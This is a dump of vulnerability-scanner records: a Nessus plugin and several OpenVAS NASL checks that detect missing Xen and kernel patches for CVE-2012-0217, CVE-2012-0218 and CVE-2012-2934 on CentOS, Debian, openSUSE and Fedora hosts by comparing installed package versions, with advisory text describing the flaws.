value:\n\"Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-June/018678.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe9573fb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0217\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-308.8.2.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-308.8.2.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.", "modified": "2019-03-18T00:00:00", "published": "2012-08-10T00:00:00", "id": "OPENVAS:136141256231071479", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071479", "type": "openvas", "title": "Debian Security Advisory DSA 2501-1 (xen)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2501_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2501-1 (xen)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71479\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:07:04 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2501-1 (xen)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202501-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\nXen does not properly handle uncanonical return addresses on\nIntel amd64 CPUs, allowing amd64 PV guests to elevate to\nhypervisor privileges. AMD processors, HVM and i386 guests\nare not affected.\n\nCVE-2012-0218\nXen does not properly handle SYSCALL and SYSENTER instructions\nin PV guests, allowing unprivileged users inside a guest\nsystem to crash the guest system.\n\nCVE-2012-2934\nXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the allow_unsafe option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your xen packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-docs-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-amd64\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-i386\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-utils-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.0.1-5.2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.", "modified": "2017-07-07T00:00:00", "published": "2012-08-10T00:00:00", "id": "OPENVAS:71479", "href": "http://plugins.openvas.org/nasl.php?oid=71479", "type": "openvas", "title": "Debian Security Advisory DSA 2501-1 (xen)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2501_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2501-1 (xen)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\nXen does not properly handle uncanonical return addresses on\nIntel amd64 CPUs, allowing amd64 PV guests to elevate to\nhypervisor privileges. AMD processors, HVM and i386 guests\nare not affected.\n\nCVE-2012-0218\nXen does not properly handle SYSCALL and SYSENTER instructions\nin PV guests, allowing unprivileged users inside a guest\nsystem to crash the guest system.\n\nCVE-2012-2934\nXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the allow_unsafe option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\n\nWe recommend that you upgrade your xen packages.\";\ntag_summary = \"The remote host is missing an update to xen\nannounced via advisory DSA 2501-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202501-1\";\n\nif(description)\n{\n script_id(71479);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:07:04 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2501-1 (xen)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-docs-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-amd64\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-hypervisor-4.0-i386\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-utils-4.0\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.0.1-5.2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-12-13T00:00:00", "id": "OPENVAS:1361412562310850281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850281", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2012:0886-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850281\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:02:09 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0886-1\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2012:0886-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.1\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE 12.1\");\n\n script_tag(name:\"insight\", value:\"This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-pdf\", rpm:\"xen-doc-pdf~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-x86\", rpm:\"xen-libs-debuginfo-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-x86\", rpm:\"xen-libs-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864509\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "Check for the Version of xen", "modified": "2018-01-08T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864509", "href": "http://plugins.openvas.org/nasl.php?oid=864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n 